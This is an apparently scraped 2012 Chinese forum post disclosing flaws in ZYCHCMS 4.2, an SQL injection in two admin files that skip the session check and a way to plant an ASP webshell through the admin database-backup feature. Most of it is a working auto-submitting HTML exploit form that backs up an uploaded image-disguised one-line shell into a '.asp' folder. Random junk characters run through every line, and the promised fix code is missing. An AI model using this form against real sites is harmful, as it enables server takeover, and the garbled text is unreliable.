( e Y- \& Z+ ^9 A. V9 p! ~
- _2 o! s* ~3 A( U5 r
8 |7 u0 o) x. n L# G* Q
( i6 C$ w7 i/ [# t影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
7 g4 N! I+ f( _ ①SQL注射漏洞
/ w% ?( w3 B/ V: g$ p 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
- T2 G4 M ?1 k; { 漏洞原因:未过滤1 ^0 a4 L. B! E Z5 H8 C( h
漏洞代码:/ _$ m: v+ e/ A! s' @3 [ H
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。# K) ?/ ^' S* Q
修复方法:在文件开头加入代码
4 U [* s1 G) N" |9 X ; O" _4 Q( N) o! E$ p3 L9 { @/ t
% \: r5 U5 I- c* o3 `& x②后台拿WBSHELL$ R) m& x ?: u* Q8 U! F5 J/ N
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。# _1 h2 S! }2 @1 |
这里在网上找了一个,改了下,将就着用。. h; D7 H+ S0 ^' Q6 g
以下是代码本地提交代码
5 I( e5 r# j# @& z 6 J& w8 g# T6 m; p. T
2 m- S7 F# J( j S( D5 U. h8 d
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
& k' c9 ^2 w0 {$ x3 x) n <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
L3 B4 P* w4 j7 D <tr>/ S+ h1 P6 F2 p. ^6 \
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
! @4 D7 ~: p5 J# [* q8 M; T9 t' ^ </tr>
, O/ |& K# J8 t/ i, ]* C5 S) U <tr>; }( k* @9 o# f# `# F
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
+ ^5 Q0 f/ Q. I1 c0 { G </span>5 [$ l" G$ S- _/ y$ X& C$ M4 }
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
3 o$ R! ]: j* j* U( f <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
4 y: p1 ^/ W, Z! ?4 J <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>& E) v* n/ N+ A" g) W4 a7 }& B
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
2 w0 n& |$ o, C Q- c <div align=”left”>
. Q: V, o: M# m1 N j, _& A* u4 v <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />& |. p7 J- Q4 U, v9 b9 h/ p8 B# F
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
5 n4 v" m; Z5 g0 v* H/ n <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
; m, L. [0 f# y a4 E </div></td>$ r* \+ Z+ X- I& W9 ?" _6 a
</tr>
5 k/ P$ ~5 s& |8 S& Z8 I <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>2 l: J; g1 c" m6 w3 A
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>) p5 h( o8 G9 ~
<td class=”td”><div align=”left”>
7 I+ G3 n6 M. ?2 l+ P6 c# J <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
) I z. n& l( g6 [ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>) F7 Y$ a, j. g& Q ?: s
</tr>
. Z6 H1 Q! ~* H: [$ _/ f <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>, z* y# r; O4 T( _# T
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
^8 v( k: Y! M5 A7 t1 N" c, A <td class=”td”><div align=”left”>
/ C# O) f/ Q% k' @" `: _ <input type=”submit” value=”确定备份” class=”btn”
" w2 X8 s5 e* C0 f" C </div></td>
, Q" k8 R, i- x0 B, T </tr>
4 V2 C/ C) m( i/ p# @* M/ C </table></td></tr></form>( s) O% h# l; \$ z
</table>
h9 {5 Y4 O: C6 o </td>
% A9 u& \, o* B: F, h# ^ </tr>9 x G! f0 t3 `. C
</table>4 c' l0 f% J- x0 s& ~9 M
<script>
9 J, k+ s. ` b, T& s0 y$ \2 J* W document.all.add.submit();' L& R: Y# y L& H, m
</script>
( T2 U9 {* h4 m2 }4 O' f; S
1 N' C3 ?) [9 q1 C1 D1 c
% s8 z- ~, D, Z& L9 ?0 A x0 A+ v7 ^! O" e9 z& _. s U
0 _* I; C7 {# \7 a
- B8 ?: C0 A c/ B$ s; @ m
: h6 _4 M# e1 ]
9 n; B3 ?9 G1 W: s
, ]: ?/ _) |( N
0 L6 ]6 d0 y4 E% U
5 G8 U6 @# H) K |
发表于 2012-9-10 21:09:51
收藏
支持
反对